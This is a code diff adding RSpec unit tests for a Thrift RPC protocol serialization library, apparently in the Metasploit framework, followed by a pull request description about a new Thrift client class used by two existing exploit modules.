+    it 'calls the function and returns the result' do
+      allow(Rex::Proto::Thrift::ThriftHeader).to receive(:new).and_call_original
+      expect(subject).to receive(:send_raw).with("\x80\x01\x00\x01\x00\x00\x00\n#{method_name}\x00\x00\x00\x00\x00".b).and_return(nil)
+      expect(subject).to receive(:recv_raw).with(timeout: subject.timeout).and_return("\x80\x01\x00\x02\x00\x00\x00\n#{method_name}\x00\x00\x00\x00\x00".b)
+      result = instance.call(method_name, { data_type: Rex::Proto::Thrift::ThriftDataType::T_STOP })
+      expect(Rex::Proto::Thrift::ThriftHeader).to have_received(:new).with(method_name: method_name, message_type: Rex::Proto::Thrift::ThriftMessageType::CALL)
+      expect(result).to be_a Array
+      expect(result[0]).to eq({ data_type: Rex::Proto::Thrift::ThriftDataType::T_STOP })
+    end
+
+    it 'raises UnexpectedReplyError on an unexpected message type' do
+      expect(subject).to receive(:send_raw).with("\x80\x01\x00\x01\x00\x00\x00\n#{method_name}\x00\x00\x00\x00\x00".b).and_return(nil)
+      expect(subject).to receive(:recv_raw).with(timeout: subject.timeout).and_return("\x80\x01\x00\x01\x00\x00\x00\n#{method_name}\x00\x00\x00\x00\x00".b)
+      expect {
+        instance.call(method_name, { data_type: Rex::Proto::Thrift::ThriftDataType::T_STOP })
+      }.to raise_error(Rex::Proto::Thrift::Error::UnexpectedReplyError)
+    end
+
+    it 'raises UnexpectedReplyError on an unexpected method name' do
+      expect(subject).to receive(:send_raw).with("\x80\x01\x00\x01\x00\x00\x00\n#{method_name}\x00\x00\x00\x00\x00".b).and_return(nil)
+      expect(subject).to receive(:recv_raw).with(timeout: subject.timeout).and_return("\x80\x01\x00\x02\x00\x00\x00\n#{method_name.swapcase}\x00\x00\x00\x00\x00".b)
+      expect {
+        instance.call(method_name, { data_type: Rex::Proto::Thrift::ThriftDataType::T_STOP })
+      }.to raise_error(Rex::Proto::Thrift::Error::UnexpectedReplyError)
+    end
+  end
+
+  describe '#connect' do
+    it 'creates a rex socket' do
+      expect(Rex::Socket::Tcp).to receive(:create)
+      instance.connect
+    end
+  end
+end

--- a/spec/lib/rex/proto/thrift/thrift_array_spec.rb
+++ b/spec/lib/rex/proto/thrift/thrift_array_spec.rb
@@ -1,0 +1,183 @@
+# -*- coding: binary -*-
+require 'spec_helper'
+require 'rex/text'
+
+RSpec.describe Rex::Proto::Thrift::ThriftArray do
+  context 'when the data type is T_BOOLEAN' do
+    let(:data_type) { Rex::Proto::Thrift::ThriftDataType::T_BOOLEAN }
+    let(:value) { {
+      data_type: data_type,
+      members: [ true ]
+    } }
+    let(:binary_s) { [data_type, 1, 1].pack('CNC') }
+
+    describe '#to_binary_s' do
+      it 'should correctly encode' do
+        expect(described_class.new(value).to_binary_s).to eq binary_s
+      end
+    end
+
+    describe '.read' do
+      it 'should correctly decode' do
+        expect(described_class.read(binary_s).snapshot.keep_if { |k,_| value.key? k }).to eq value
+      end
+    end
+  end
+
+  context 'when the data type is T_I16' do
+    let(:data_type) { Rex::Proto::Thrift::ThriftDataType::T_I16 }
+    let(:number) { 0x7fff - rand(0xffff) }
+    let(:value) { {
+      data_type: data_type,
+      members: [ number ]
+    } }
+    let(:binary_s) { [data_type, 2, number].pack('CNs>') }
+
+    describe '#to_binary_s' do
+      it 'should correctly encode' do
+        expect(described_class.new(value).to_binary_s).to eq binary_s
+      end
+    end
+
+    describe '.read' do
+      it 'should correctly decode' do
+        expect(described_class.read(binary_s).snapshot.keep_if { |k,_| value.key? k }).to eq value
+      end
+    end
+  end
+
+  context 'when the data type is T_I32' do
+    let(:data_type) { Rex::Proto::Thrift::ThriftDataType::T_I32 }
+    let(:number) { 0x7fffffff - rand(0xffffffff) }
+    let(:value) { {
+      data_type: data_type,
+      members: [ number ]
+    } }
+    let(:binary_s) { [data_type, 4, number].pack('CNl>') }
+
+    describe '#to_binary_s' do
+      it 'should correctly encode' do
+        expect(described_class.new(value).to_binary_s).to eq binary_s
+      end
+    end
+
+    describe '.read' do
+      it 'should correctly decode' do
+        expect(described_class.read(binary_s).snapshot.keep_if { |k,_| value.key? k }).to eq value
+      end
+    end
+  end
+
+  context 'when the data type is T_I64' do
+    let(:data_type) { Rex::Proto::Thrift::ThriftDataType::T_I64 }
+    let(:number) { 0x7fffffffffffffff - rand(0xffffffffffffffff) }
+    let(:value) { {
+      data_type: data_type,
+      members: [ number ]
+    } }
+    let(:binary_s) { [data_type, 8, number].pack('CNq>') }
+
+    describe '#to_binary_s' do
+      it 'should correctly encode' do
+        expect(described_class.new(value).to_binary_s).to eq binary_s
+      end
+    end
+
+    describe '.read' do
+      it 'should correctly decode' do
+        expect(described_class.read(binary_s).snapshot.keep_if { |k,_| value.key? k }).to eq value
+      end
+    end
+  end
+
+  context 'when the data type is T_UTF7' do
+    let(:data_type) { Rex::Proto::Thrift::ThriftDataType::T_UTF7 }
+    let(:text) { Rex::Text.rand_text_alphanumeric(10) }
+    let(:value) { {
+      data_type: data_type,
+      members: [ text ]
+    } }
+    let(:binary_s) { [data_type, text.length + 4, text.length].pack('CNN') + text }
+
+    describe '#to_binary_s' do
+      it 'should correctly encode' do
+        expect(described_class.new(value).to_binary_s).to eq binary_s
+      end
+    end
+
+    describe '.read' do
+      it 'should correctly decode' do
+        expect(described_class.read(binary_s).snapshot.keep_if { |k,_| value.key? k }).to eq value
+      end
+    end
+  end
+
+  context 'when the data type is T_STRUCT' do
+    let(:data_type) { Rex::Proto::Thrift::ThriftDataType::T_STRUCT }
+    # use an empty struct
+    let(:object) { [ { data_type: Rex::Proto::Thrift::ThriftDataType::T_STOP } ] }
+    let(:value) { {
+      data_type: data_type,
+      members: [ object ]
+    } }
+    let(:binary_s) { [data_type, 1, 0].pack('CNC') }
+
+    describe '#to_binary_s' do
+      it 'should correctly encode' do
+        expect(described_class.new(value).to_binary_s).to eq binary_s
+      end
+    end
+
+    describe '.read' do
+      it 'should correctly decode' do
+        expect(described_class.read(binary_s).snapshot.keep_if { |k,_| value.key? k }).to eq value
+      end
+    end
+  end
+
+  context 'when the data type is T_SET' do
+    let(:data_type) { Rex::Proto::Thrift::ThriftDataType::T_SET }
+    # use an empty set
+    let(:object) { { data_type: Rex::Proto::Thrift::ThriftDataType::T_I16, members_size: 0 } }
+    let(:value) { {
+      data_type: data_type,
+      members: [ object ]
+    } }
+    let(:binary_s) { [data_type, 5, Rex::Proto::Thrift::ThriftDataType::T_I16, 0].pack('CNCN') }
+
+    describe '#to_binary_s' do
+      it 'should correctly encode' do
+        expect(described_class.new(value).to_binary_s).to eq binary_s
+      end
+    end
+
+    describe '.read' do
+      it 'should correctly decode' do
+        expect(described_class.read(binary_s).snapshot.keep_if { |k,_| value.key? k }).to eq value
+      end
+    end
+  end
+
+  context 'when the data type is T_LIST' do
+    let(:data_type) { Rex::Proto::Thrift::ThriftDataType::T_LIST }
+    # use an empty set
+    let(:object) { { data_type: Rex::Proto::Thrift::ThriftDataType::T_I16, members_size: 0 } }
+    let(:value) { {
+      data_type: data_type,
+      members: [ object ]
+    } }
+    let(:binary_s) { [data_type, 5, Rex::Proto::Thrift::ThriftDataType::T_I16, 0].pack('CNCN') }
+
+    describe '#to_binary_s' do
+      it 'should correctly encode' do
+        expect(described_class.new(value).to_binary_s).to eq binary_s
+      end
+    end
+
+    describe '.read' do
+      it 'should correctly decode' do
+        expect(described_class.read(binary_s).snapshot.keep_if { |k,_| value.key? k }).to eq value
+      end
+    end
+  end
+end

--- a/spec/lib/rex/proto/thrift/thrift_boolean_spec.rb
+++ b/spec/lib/rex/proto/thrift/thrift_boolean_spec.rb
@@ -1,0 +1,20 @@
+# -*- coding: binary -*-
+require 'spec_helper'
+require 'rex/text'
+
+RSpec.describe Rex::Proto::Thrift::ThriftBoolean do
+  let(:value) { true }
+  let(:binary_s) { "\x01".b }
+
+  describe '#to_binary_s' do
+    it 'should correctly encode' do
+      expect(described_class.new(value).to_binary_s).to eq binary_s
+    end
+  end
+
+  describe '.read' do
+    it 'should correctly decode' do
+      expect(described_class.read(binary_s)).to eq value
+    end
+  end
+end

--- a/spec/lib/rex/proto/thrift/thrift_data_spec.rb
+++ b/spec/lib/rex/proto/thrift/thrift_data_spec.rb
@@ -1,0 +1,242 @@
+# -*- coding: binary -*-
+require 'spec_helper'
+require 'rex/text'
+
+RSpec.describe Rex::Proto::Thrift::ThriftData do
+  subject(:instance) { described_class.new }
+
+  it { should respond_to :data_type }
+  it { should respond_to :field_id }
+  it { should respond_to :data_value }
+
+  it 'is big endian' do
+    expect(described_class.fields.instance_variable_get(:@hints)[:endian]).to eq :big
+  end
+
+  it 'tracks the data type in a ThriftDataType field' do
+    expect(instance.data_type).to be_a Rex::Proto::Thrift::ThriftDataType
+  end
+
+  it 'tracks the field ID in a Uint16 field' do
+    expect(instance.field_id).to be_a BinData::Uint16be
+  end
+
+  it 'tracks the data value in a Choice field' do
+    expect(instance.data_value).to be_a BinData::Choice
+  end
+
+  it 'sets the data type correctly by default' do
+    expect(instance.data_type).to eq Rex::Proto::Thrift::ThriftDataType::T_STOP
+  end
+
+  context 'when the data type is T_STOP' do
+    let(:data_type) { Rex::Proto::Thrift::ThriftDataType::T_STOP }
+    let(:value) { {
+      data_type: data_type
+    } }
+    let(:binary_s) { [data_type].pack('C') }
+
+    describe '#to_binary_s' do
+      it 'should correctly encode' do
+        expect(described_class.new(value).to_binary_s).to eq binary_s
+      end
+    end
+
+    describe '.read' do
+      it 'should correctly decode' do
+        expect(described_class.read(binary_s).snapshot.keep_if { |k,_| value.key? k }).to eq value
+      end
+    end
+  end
+
+  context 'when the data type is T_BOOLEAN' do
+    let(:data_type) { Rex::Proto::Thrift::ThriftDataType::T_BOOLEAN }
+    let(:field_id) { rand(0xffff) }
+    let(:value) { {
+      data_type: data_type,
+      field_id: field_id,
+      data_value: true
+    } }
+    let(:binary_s) { [data_type, field_id, 1].pack('CnC') }
+
+    describe '#to_binary_s' do
+      it 'should correctly encode' do
+        expect(described_class.new(value).to_binary_s).to eq binary_s
+      end
+    end
+
+    describe '.read' do
+      it 'should correctly decode' do
+        expect(described_class.read(binary_s).snapshot.keep_if { |k,_| value.key? k }).to eq value
+      end
+    end
+  end
+
+  context 'when the data type is T_I16' do
+    let(:data_type) { Rex::Proto::Thrift::ThriftDataType::T_I16 }
+    let(:field_id) { rand(0xffff) }
+    let(:number) { 0x7fff - rand(0xffff) }
+    let(:value) { {
+      data_type: data_type,
+      field_id: field_id,
+      data_value: number
+    } }
+    let(:binary_s) { [data_type, field_id, number].pack('Cns>') }
+
+    describe '#to_binary_s' do
+      it 'should correctly encode' do
+        expect(described_class.new(value).to_binary_s).to eq binary_s
+      end
+    end
+
+    describe '.read' do
+      it 'should correctly decode' do
+        expect(described_class.read(binary_s).snapshot.keep_if { |k,_| value.key? k }).to eq value
+      end
+    end
+  end
+
+  context 'when the data type is T_I32' do
+    let(:data_type) { Rex::Proto::Thrift::ThriftDataType::T_I32 }
+    let(:field_id) { rand(0xffff) }
+    let(:number) { 0x7fffffff - rand(0xffffffff) }
+    let(:value) { {
+      data_type: data_type,
+      field_id: field_id,
+      data_value: number
+    } }
+    let(:binary_s) { [data_type, field_id, number].pack('Cnl>') }
+
+    describe '#to_binary_s' do
+      it 'should correctly encode' do
+        expect(described_class.new(value).to_binary_s).to eq binary_s
+      end
+    end
+
+    describe '.read' do
+      it 'should correctly decode' do
+        expect(described_class.read(binary_s).snapshot.keep_if { |k,_| value.key? k }).to eq value
+      end
+    end
+  end
+
+  context 'when the data type is T_I64' do
+    let(:data_type) { Rex::Proto::Thrift::ThriftDataType::T_I64 }
+    let(:field_id) { rand(0xffff) }
+    let(:number) { 0x7fffffffffffffff - rand(0xffffffffffffffff) }
+    let(:value) { {
+      data_type: data_type,
+      field_id: field_id,
+      data_value: number
+    } }
+    let(:binary_s) { [data_type, field_id, number].pack('Cnq>') }
+
+    describe '#to_binary_s' do
+      it 'should correctly encode' do
+        expect(described_class.new(value).to_binary_s).to eq binary_s
+      end
+    end
+
+    describe '.read' do
+      it 'should correctly decode' do
+        expect(described_class.read(binary_s).snapshot.keep_if { |k,_| value.key? k }).to eq value
+      end
+    end
+  end
+
+  context 'when the data type is T_UTF7' do
+    let(:data_type) { Rex::Proto::Thrift::ThriftDataType::T_UTF7 }
+    let(:field_id) { rand(0xffff) }
+    let(:text) { Rex::Text.rand_text_alphanumeric(10) }
+    let(:value) { {
+      data_type: data_type,
+      field_id: field_id,
+      data_value: text
+    } }
+    let(:binary_s) { [data_type, field_id, text.length].pack('CnN') + text }
+
+    describe '#to_binary_s' do
+      it 'should correctly encode' do
+        expect(described_class.new(value).to_binary_s).to eq binary_s
+      end
+    end
+
+    describe '.read' do
+      it 'should correctly decode' do
+        expect(described_class.read(binary_s).snapshot.keep_if { |k,_| value.key? k }).to eq value
+      end
+    end
+  end
+
+  context 'when the data type is T_STRUCT' do
+    let(:data_type) { Rex::Proto::Thrift::ThriftDataType::T_STRUCT }
+    let(:field_id) { rand(0xffff) }
+    let(:object) { [ { data_type: Rex::Proto::Thrift::ThriftDataType::T_STOP } ] }
+    let(:value) { {
+      data_type: data_type,
+      field_id: field_id,
+      data_value: object
+    } }
+    let(:binary_s) { [data_type, field_id, 0].pack('CnC') }
+
+    describe '#to_binary_s' do
+      it 'should correctly encode' do
+        expect(described_class.new(value).to_binary_s).to eq binary_s
+      end
+    end
+
+    describe '.read' do
+      it 'should correctly decode' do
+        expect(described_class.read(binary_s).snapshot.keep_if { |k,_| value.key? k }).to eq value
+      end
+    end
+  end
+
+  context 'when the data type is T_SET' do
+    let(:data_type) { Rex::Proto::Thrift::ThriftDataType::T_SET }
+    let(:field_id) { rand(0xffff) }
+    let(:object) { { data_type: Rex::Proto::Thrift::ThriftDataType::T_I16, members_size: 0 } }
+    let(:value) { {
+      data_type: data_type,
+      field_id: field_id,
+      data_value: object
+    } }
+    let(:binary_s) { [data_type, field_id, Rex::Proto::Thrift::ThriftDataType::T_I16, 0].pack('CnCN') }
+
+    describe '#to_binary_s' do
+      it 'should correctly encode' do
+        expect(described_class.new(value).to_binary_s).to eq binary_s
+      end
+    end
+
+    describe '.read' do
+      it 'should correctly decode' do
+        expect(described_class.read(binary_s).snapshot.keep_if { |k,_| value.key? k }).to eq value
+      end
+    end
+  end
+
+  context 'when the data type is T_LIST' do
+    let(:data_type) { Rex::Proto::Thrift::ThriftDataType::T_LIST }
+    let(:field_id) { rand(0xffff) }
+    let(:object) { { data_type: Rex::Proto::Thrift::ThriftDataType::T_I16, members_size: 0 } }
+    let(:value) { {
+      data_type: data_type,
+      field_id: field_id,
+      data_value: object
+    } }
+    let(:binary_s) { [data_type, field_id, Rex::Proto::Thrift::ThriftDataType::T_I16, 0].pack('CnCN') }
+
+    describe '#to_binary_s' do
+      it 'should correctly encode' do
+        expect(described_class.new(value).to_binary_s).to eq binary_s
+      end
+    end
+
+    describe '.read' do
+      it 'should correctly decode' do
+        expect(described_class.read(binary_s).snapshot.keep_if { |k,_| value.key? k }).to eq value
+      end
+    end
+  end
+end

--- a/spec/lib/rex/proto/thrift/thrift_header_spec.rb
+++ b/spec/lib/rex/proto/thrift/thrift_header_spec.rb
@@ -1,0 +1,46 @@
+RSpec.describe Rex::Proto::Thrift::ThriftHeader do
+  let(:value) { { version: 0x8001, message_type: 1, method_name: '', sequence_id: 1 } }
+  let(:binary_s) { "\x80\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01".b }
+  subject(:instance) { described_class.new }
+
+  it { should respond_to :version }
+  it { should respond_to :message_type }
+  it { should respond_to :method_name }
+  it { should respond_to :sequence_id }
+
+  it 'is big endian' do
+    expect(described_class.fields.instance_variable_get(:@hints)[:endian]).to eq :big
+  end
+
+  it 'tracks the version in a Uint16 field' do
+    expect(instance.version).to be_a BinData::Uint16be
+  end
+
+  it 'tracks the message type in a ThriftMessageType field' do
+    expect(instance.message_type).to be_a Rex::Proto::Thrift::ThriftMessageType
+  end
+
+  it 'tracks the method name in a ThriftString field' do
+    expect(instance.method_name).to be_a Rex::Proto::Thrift::ThriftString
+  end
+
+  it 'tracks the sequence ID in a Uint32 field' do
+    expect(instance.sequence_id).to be_a BinData::Uint32be
+  end
+
+  it 'sets the version correctly by default' do
+    expect(instance.version).to eq 0x8001
+  end
+
+  describe '#to_binary_s' do
+    it 'should correctly encode' do
+      expect(described_class.new(value).to_binary_s).to eq binary_s
+    end
+  end
+
+  describe '.read' do
+    it 'should correctly decode' do
+      expect(described_class.read(binary_s)).to eq value
+    end
+  end
+end

--- a/spec/lib/rex/proto/thrift/thrift_string_spec.rb
+++ b/spec/lib/rex/proto/thrift/thrift_string_spec.rb
@@ -1,0 +1,20 @@
+# -*- coding: binary -*-
+require 'spec_helper'
+require 'rex/text'
+
+RSpec.describe Rex::Proto::Thrift::ThriftString do
+  let(:value) { Rex::Text.rand_text_alphanumeric(10) }
+  let(:binary_s) { [value.length].pack('N') + value }
+
+  describe '#to_binary_s' do
+    it 'should correctly encode' do
+      expect(described_class.new(value).to_binary_s).to eq binary_s
+    end
+  end
+
+  describe '.read' do
+    it 'should correctly decode' do
+      expect(described_class.read(binary_s)).to eq value
+    end
+  end
+end

--- a/spec/lib/rex/proto/thrift/thrift_struct_spec.rb
+++ b/spec/lib/rex/proto/thrift/thrift_struct_spec.rb
@@ -1,0 +1,24 @@
+# -*- coding: binary -*-
+require 'spec_helper'
+require 'rex/text'
+
+RSpec.describe Rex::Proto::Thrift::ThriftStruct do
+  let(:text) { Rex::Text.rand_text_alphanumeric(10) }
+  let(:value) { [
+    { field_id: 1, data_type: Rex::Proto::Thrift::ThriftDataType::T_UTF7, data_value: text },
+    { data_type: Rex::Proto::Thrift::ThriftDataType::T_STOP }
+  ] }
+  let(:binary_s) { [Rex::Proto::Thrift::ThriftDataType::T_UTF7, 1, text.length].pack('CnN') + text + "\x00".b }
+
+  describe '#to_binary_s' do
+    it 'should correctly encode' do
+      expect(described_class.new(value).to_binary_s).to eq binary_s
+    end
+  end
+
+  describe '.read' do
+    it 'should correctly decode' do
+      expect(described_class.read(binary_s)).to eq value
+    end
+  end
+end


### PR DESCRIPTION
This adds a new ThriftClient class for interacting with Thrift RPC services. It then updates the two existing Metasploit modules to use it. It also includes additional type definitions, allowing the updated modules to define their data instead of using opaque blobs.

Both exploits were retested to ensure they're still functioning correctly.

- [ ] Test [nimbus_gettopologyhistory_cmd_exec](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/misc/nimbus_gettopologyhistory_cmd_exec.md#verification-steps)
- [ ] Test [vmware_vrli_rce](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/vmware_vrli_rce.md#testing)